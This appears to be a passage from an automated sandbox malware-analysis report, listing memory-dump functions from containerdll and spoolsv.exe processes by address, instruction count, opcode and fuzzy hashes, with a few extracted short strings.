Opcode ID: 9a4b2f341302756fc30373c0514700e89124b7ddb45dc2943cadc6c5ef701be8
Instruction ID: 0b5f1f72eaf8d83ea7d275feab1d6b1dd9922ab78ef9e82277cec02a12984657
Opcode Fuzzy Hash: 9a4b2f341302756fc30373c0514700e89124b7ddb45dc2943cadc6c5ef701be8
Instruction Fuzzy Hash: 2EF01D7092CA5E9EEB94FF6898592BA7AA0FF14241F00143BE85DC21D1EB745550CB44

Function 00007FF848F3AFCB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62ccf9c4f871bf7fe2cc773abe9dd085d2699aaffa4f1980ff1cb44f06c4a36
Instruction ID: f0820ddb5284fdc5636400120a64815b67ba084d91f70243d155675ebbc8f33e
Opcode Fuzzy Hash: b62ccf9c4f871bf7fe2cc773abe9dd085d2699aaffa4f1980ff1cb44f06c4a36
Instruction Fuzzy Hash: B0F0C4709199198EEB90EB28C456BE9B3B1FF58380F1082A6C40DD3196CB34AAC18B44

Function 00007FF848F3C270 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61cce31bb2667419b5d1921769e8ab786650577a78c87082e71b08b9713db772
Instruction ID: d86d268bb364efa461746f0f5318981711dc1d1850601b1a1ed04b2018e9bea2
Opcode Fuzzy Hash: 61cce31bb2667419b5d1921769e8ab786650577a78c87082e71b08b9713db772
Instruction Fuzzy Hash: D9F05E30818A4E8EEB84EF6898082FE77E0FF18301F40093BE81DD2190EB3091608744

Function 00007FF848F327CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
Instruction ID: c329ae4e80c3759325399ba9f5f38cf91314f3fd784a932d0f242b3d9667f407
Opcode Fuzzy Hash: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
Instruction Fuzzy Hash: DBF0BE7080E78E8FEB59AF6488292BD7BA0FF15306F4544BFE809C60D2EB39A454C741

Function 00007FF848F30F7D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8154425d4034458c72a240ae063365b99a535b0ec41015051dc3719e3c1a3021
Instruction ID: 1d6f6dd95edce902366b6aa13949a97629cf95ecaa2347e6faf6ed42cf7d12f9
Opcode Fuzzy Hash: 8154425d4034458c72a240ae063365b99a535b0ec41015051dc3719e3c1a3021
Instruction Fuzzy Hash: 4EF0173090E51A8FEB50FB14C894BEEB7B1EB94351F145276D409A32D5DF3869848B98

Function 00007FF848F3244C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
Instruction ID: 46a0685406326526ae331d5ebdf5fcb8e67d32195525c46926d1c5cdc454e07b
Opcode Fuzzy Hash: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
Instruction Fuzzy Hash: D4F0F27090851A9FEB64FB04C9487AC73B0FF85341F1081BAC54EE62E0DF782A898B08

Function 00007FF848F3C861 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d34f91a8a65aac5e280c3d482d6d0172f1d3671abb8bfe1be90fd78044c73e
Instruction ID: b9926111989aec9ed255b17fb17167c858c3264122239fe0b86dfd18a0a8d4d9
Opcode Fuzzy Hash: 74d34f91a8a65aac5e280c3d482d6d0172f1d3671abb8bfe1be90fd78044c73e
Instruction Fuzzy Hash: 2BD0173180965E9FDF95EB5498951BE7BE0FF58344F00046AE81ED30D0EB34A5208744

Non-executed Functions

Function 00007FF848F3EB93 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F3EBB7
N, xrefs: 00007FF848F3EC1B
", xrefs: 00007FF848F3EBA7
(, xrefs: 00007FF848F3EBE0

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID: "$($M$N
API String ID: 0-2673639397
Opcode ID: e084ef111f2c671935d18f65df1e383bdc9d04318b3aa05fd6b1bffe52fdb0a1
Instruction ID: d115bf74d3b616e5bdcbda2dfd41237ad8b078f55dda52cdf483a3e8acc4a4e6
Opcode Fuzzy Hash: e084ef111f2c671935d18f65df1e383bdc9d04318b3aa05fd6b1bffe52fdb0a1
Instruction Fuzzy Hash: 9511F571E0822A8FDB65EF24D8843EEB6F1AF48340F4041EAD409A6290DB789A80CF44

Analysis Process: spoolsv.exePID: 6416, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F33565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8566bbcf17bda5cd67a3070e5dcc44c468f2901c73311042750e075d689297d8
Instruction ID: a5c55f006f28302dae977f7161a4bdc2985cc876cc0a6faef5eccc0446055b4e
Opcode Fuzzy Hash: 8566bbcf17bda5cd67a3070e5dcc44c468f2901c73311042750e075d689297d8
Instruction Fuzzy Hash: 5291AD71E1CA4E8FE784EB2CD8157A9BFE1FB9A390F40017AC009D72C6DF6928058B55

Function 00007FF848F418E8 Relevance: 3.8, Strings: 3, Instructions: 63COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF848F41944
*, xrefs: 00007FF848F41979
/, xrefs: 00007FF848F41288

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID: *$-$/
API String ID: 0-145748381
Opcode ID: 4fbb5f2fd114bc9cc7bf086bac3230cb547e6251cda86ccaa280b40c37bf7849
Instruction ID: 4bcc27a425a74f2433eac8e96aec1a240b989288653c1852dde2aa068d9f8bc9
Opcode Fuzzy Hash: 4fbb5f2fd114bc9cc7bf086bac3230cb547e6251cda86ccaa280b40c37bf7849
Instruction Fuzzy Hash: 4321F075D0822A8FEB68EF54C8947EDB7B1FB54351F0041BAD04EA6281DB386A84DB00

Function 00007FF848F3D78A Relevance: 2.9, Strings: 2, Instructions: 387COMMON

Download Yara Rule

Strings

NH, xrefs: 00007FF848F3D824
p\H, xrefs: 00007FF848F3D892

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: 4e5a75fe8362f3c9f99c2b16beb3f2a7fd7e0acb4a69473aae45004b25be0aab
Instruction ID: 54e4de906a619c1983df18a36e1cffcfc8de56a81ad04dc20646b4bfa8978ddc
Opcode Fuzzy Hash: 4e5a75fe8362f3c9f99c2b16beb3f2a7fd7e0acb4a69473aae45004b25be0aab
Instruction Fuzzy Hash: F4E12671D1965ADFEB98EB68D4957B8B7B1FF58340F1400BAD00EE3296CB386880CB55

Function 00007FF848F4515D Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F4526A

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 3d2ed9a437279a892e2da8ac67187004930df2ec9c89e3fc689e2a092e49ffd4
Instruction ID: f8ea956280264889026010f07451fd27b4b1560dae16fecbbf690f7edcbaaf6b
Opcode Fuzzy Hash: 3d2ed9a437279a892e2da8ac67187004930df2ec9c89e3fc689e2a092e49ffd4
Instruction Fuzzy Hash: 29512A70D09A5D9FEB94EB68D8597ADBBF1FF68341F5000AAD00DE7296DB3468818B40

Function 00007FF848F45170 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F4526A

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: b8ea157e700e0558e134320beec8a5d901d256053d47a52c7093f728302935f5
Instruction ID: 250a24ec06317f4c21b2d0b2f8b3e9bbd2be260b3e7765c99d81013f9a1c4fd7
Opcode Fuzzy Hash: b8ea157e700e0558e134320beec8a5d901d256053d47a52c7093f728302935f5
Instruction Fuzzy Hash: 19511A70D18A5D9FEB94EB68D859BADBBF1FF68740F00006AD00DE7292CF3469818B40

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID: vH
API String ID: 0-2844672238
Opcode ID: 7494bf02d2e11e2dc5c81e8610cff549e812ab605684b48defd47b46dc43cf4d
Instruction ID: c4b60594b384e5f817d890ef2fc697dbe5794ca89f8f15574b9e3053f56e37d2
Opcode Fuzzy Hash: 7494bf02d2e11e2dc5c81e8610cff549e812ab605684b48defd47b46dc43cf4d
Instruction Fuzzy Hash: 75116A31D0954E9FEB80FB68D8492BE7BE0FF98381F4005B7D809C6192EF38A5448700

Function 00007FF848F311BD Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F3122D

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
Instruction ID: 9d86d3d813759855050cb1b53734d10fff5f2b30a638e5731e3d8ee9a824e33a
Opcode Fuzzy Hash: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
Instruction Fuzzy Hash: 5E116D7090D68A8FEB99FB6488696B97BE0FF59341F0504BBE40AD60D2EF259484C714

Function 00007FF848F311D0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F3122D

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
Instruction ID: 8878bf856c6102ff35e46026a1b48b00ccf0ec8554f7cf5235ba2541dca8ba5c
Opcode Fuzzy Hash: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
Instruction Fuzzy Hash: A0F0AF30C1D69E8EEF99BB6888192FA77E4FF59341F00047BE41DD20D1EF245594C614

Function 00007FF848F432DD Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd914caf6a90205613aaf8b981e66f83d9d74e2ee239945c4d452a6d0ab5199f
Instruction ID: edd85d1c030b79bd68d1343da976ee8c177bb7b0689472eddb393dd8faad12f1
Opcode Fuzzy Hash: cd914caf6a90205613aaf8b981e66f83d9d74e2ee239945c4d452a6d0ab5199f
Instruction Fuzzy Hash: D511823190D68A9FE742A73888599AABBF0FF26740F0504F3D448D71E3EA28A554C725

Function 00007FF848F43B15 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e478b8fbad6fef209f96a0b9a1fe959e744f2d082ff7070bda42baea8a5deab5
Instruction ID: 4fbedbff3d3a33e8371727dd60ba27ae217f9e5b763169d4455808f0080c0ecc
Opcode Fuzzy Hash: e478b8fbad6fef209f96a0b9a1fe959e744f2d082ff7070bda42baea8a5deab5
Instruction Fuzzy Hash: 68C1A570E19A2E8FDBA4EB58C855BEDB7B1FF68740F1041AAD00DE3291DB3469848F45

Function 00007FF848F316B8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
Instruction ID: 9170a1002fc1ea991dfd2fe8b8ce2e10ca161ad058fb62f6734ea041c9fbc7b5
Opcode Fuzzy Hash: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
Instruction Fuzzy Hash: 10819C31A0CA4A8FDB58EB2888555B977E2FF99740F14457AE44EC32C6CF34AC82C785

Function 00007FF848F42811 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592cd5fc5aa1e9dc8710723ec31b94ad7274bba47a1558cbf85690625bd9bae5
Instruction ID: a263081b2962b6569a454b9be89b1b21288b213504eeced62927c5eb5b4bdacb
Opcode Fuzzy Hash: 592cd5fc5aa1e9dc8710723ec31b94ad7274bba47a1558cbf85690625bd9bae5
Instruction Fuzzy Hash: A271D370D1861D8EEBA4EBA8C8557ECB6B1FF58341F5041BAD40DE3292DF386A84CB54

Function 00007FF848F31D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
Instruction ID: a9843b0c3ffe2190da301f9f06f085ed65d49a85a506b91b47daf5f1cb1f8377
Opcode Fuzzy Hash: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
Instruction Fuzzy Hash: 0151B131A0CA9A8FDB48EF1888545BA77E2FF98340F14457EE44AC7285CF34E842C785

Function 00007FF848F3BF8A Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940ba6743f434643d5eda26d65b005966163930f3544318ece41ad857ee31de2
Instruction ID: bb7826f792acc2fe4f0bf7b61f869b965426d4785bd71b4c7746e7fa7f91ea45
Opcode Fuzzy Hash: 940ba6743f434643d5eda26d65b005966163930f3544318ece41ad857ee31de2
Instruction Fuzzy Hash: 1651F570E1CA5D8EEB94FBA8C4556BDBBB1FF58340F50113AD409E7282DF34A8948B84

Function 00007FF848F33155 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e8e02992318d727ed395e70921f3cc2c549375b12b4f5e59cd13418d000106
Instruction ID: 9b5b124a2cc50e9b25434f8bd2c44e2a143acb9b1fd067f42b9df112c190c281
Opcode Fuzzy Hash: 72e8e02992318d727ed395e70921f3cc2c549375b12b4f5e59cd13418d000106
Instruction Fuzzy Hash: 4C510470D0951E8FEB54EBA8E8596EDBBB1EF49341F40017AD409E72D2DB38A944CB24

Function 00007FF848F45FF5 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c458781dce71153f6da50fbe57c660f623978e4d902402bc284a0aa8dd71aad
Instruction ID: 1a6da3f892ba7ca4a880e876929c36b5ee81232f13b166d4c15dd98a1dfef19c
Opcode Fuzzy Hash: 5c458781dce71153f6da50fbe57c660f623978e4d902402bc284a0aa8dd71aad
Instruction Fuzzy Hash: 4B51DA71D085199FEBA8EB58C8597A9B7B1FF68741F1041BAC00EE32D1DF3869858F05

Function 00007FF848F32145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10185f4de886ff0c6d401402ec627656b2527bd3a946e05f28191220de37b10
Instruction ID: 5d5270ede837ffae500bcbd41e912c693a61041d99d8f0299c2bf2908a128e5b
Opcode Fuzzy Hash: b10185f4de886ff0c6d401402ec627656b2527bd3a946e05f28191220de37b10
Instruction Fuzzy Hash: B4414631E1DA8A0FE346F77898451B8BBE0EF4A381F0541BBD40DC71D2DF28A8418365

Function 00007FF848F3C6FB Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8693215e0b389b8bac8ea071f1de4d650e432ce7925990845db1f01fb0d1ae00
Instruction ID: 7eccaa37dc1bea4642c9bdb31a7b86e70955bd30f6cec0be433047f976cd8e10
Opcode Fuzzy Hash: 8693215e0b389b8bac8ea071f1de4d650e432ce7925990845db1f01fb0d1ae00
Instruction Fuzzy Hash: 3441B23691E65A9FEB457BA8B8050FD7B60EF423B9F040237D908C90C3EF2C645182A9

Function 00007FF848F42A38 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d785e56dd9d291fe42d22eb1c3284f3f603531058532ca4ed4febfdd5e1a9291
Instruction ID: e721a34c7c4c3c13453e6cb80dc35cc6f5f2511e0e4cddb235ce35a64edfb368
Opcode Fuzzy Hash: d785e56dd9d291fe42d22eb1c3284f3f603531058532ca4ed4febfdd5e1a9291
Instruction Fuzzy Hash: 2251F370D1952A8FEB64EB98C8557EDB7B0FF18340F1041BAD40DA3282EF782A858F44

Function 00007FF848F439FA Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319574726f18fc1c379f58c3fb48f90aa91567f595d3adad122dc6234f6d0213
Instruction ID: c1e7e8a949dd026b7d355a615272d70e4621a37b8fd946ee270ff9420ea2a8ed
Opcode Fuzzy Hash: 319574726f18fc1c379f58c3fb48f90aa91567f595d3adad122dc6234f6d0213
Instruction Fuzzy Hash: C2314A36A0D586AEE702FBBCA8554FA7BE0FF16361F1404B7C148DB0A3DB64A084C754

Function 00007FF848F3C024 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 812030e7c06a1a4cba00c9244c8bf81a79ba9679b2039ce2e08bd7db64eaf6de
Instruction ID: dedb250e6d08933d2a41a06a80d565c2cc81c9783b032c35992d5330c4044d4f
Opcode Fuzzy Hash: 812030e7c06a1a4cba00c9244c8bf81a79ba9679b2039ce2e08bd7db64eaf6de
Instruction Fuzzy Hash: DD31E770E1C95D9EEB94FBA8D855ABCB7B2FF58340F50503AC40DE3282DF24A8819B44

Function 00007FF848F3C09C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d45863ada567296479eea560b6c67e7fc0d7f14dfef2e609f17b254a5714810
Instruction ID: 0bdb36254c563461d6efd6c0ab4da5d4d3e1dbb1cda82ea404ccd0854a078c24
Opcode Fuzzy Hash: 3d45863ada567296479eea560b6c67e7fc0d7f14dfef2e609f17b254a5714810
Instruction Fuzzy Hash: C1310870E1C95D8FEB94FBA88895ABCBBB1FF59340F50112AC40DE72C2DF2468519B44

Function 00007FF848F3AC5D Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e8211392b9d282d49c1f08452eaea8ce97ac0a9b04e2e7afc94c04996ab2f7
Instruction ID: 2b17856c87fe5c7ac8ee5cfbc7ce826ad1dac44c175a2594e0596aae669f25d5
Opcode Fuzzy Hash: 46e8211392b9d282d49c1f08452eaea8ce97ac0a9b04e2e7afc94c04996ab2f7
Instruction Fuzzy Hash: 0221B171E0CD4A9FE785FB3998582B9BBE0FF55391F0844B7C019C60D2EF29A4868344

Function 00007FF848F33288 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea545a63f9bc9884d1824929ff229c54142c2542fb34cc2abdd347f62022e4fa
Instruction ID: 49077f4ada0a596cdeeb34745f00ab47b10967d6d58ed48287a4c4ae430ea8fe
Opcode Fuzzy Hash: ea545a63f9bc9884d1824929ff229c54142c2542fb34cc2abdd347f62022e4fa
Instruction Fuzzy Hash: 1021D470D0891D8FEB94EB98D895AEDB7F1FF58341F10416AD00AE72E5CB38A944DB14

Function 00007FF848F33350 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
Instruction ID: 306275356e0a6aebf6a7e372af7b83ae66d50b5b9ab63aea9c6f6b296ea03b12
Opcode Fuzzy Hash: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
Instruction Fuzzy Hash: 1D21B13084D68A8FE742EB78885C5E97FF0EF5B301F0844EBD449CB1A2DA38954AC761

Function 00007FF848F42128 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf504438ff0977ac2fa646fba062b6695710031e3f729b9feeb2a9022070ec4b
Instruction ID: 0434623e5d584cf20f3b58878a496606bb9e24ea9cdeade8f1352ebacd67fb46
Opcode Fuzzy Hash: cf504438ff0977ac2fa646fba062b6695710031e3f729b9feeb2a9022070ec4b
Instruction Fuzzy Hash: E621FF3084E2C94FE707AB7488655E97FB0EF57204F0944FBD48ACB4E3DA28655AC311

Function 00007FF848F4259F Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05de50311602c31f62e5093a3b218eaa54c0cdfb98accee5e2ade61cbc10a8f
Instruction ID: 0e6c3c74eed8ec7ff683d1e58d4ea94c2f35acce00412c94fd623b1e332020ad
Opcode Fuzzy Hash: a05de50311602c31f62e5093a3b218eaa54c0cdfb98accee5e2ade61cbc10a8f
Instruction Fuzzy Hash: 1D219A3084E6894FDB46AB6088691B97FB0EF16211F1900FBC409DB0E3DB296949CB51

Function 00007FF848F46C75 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

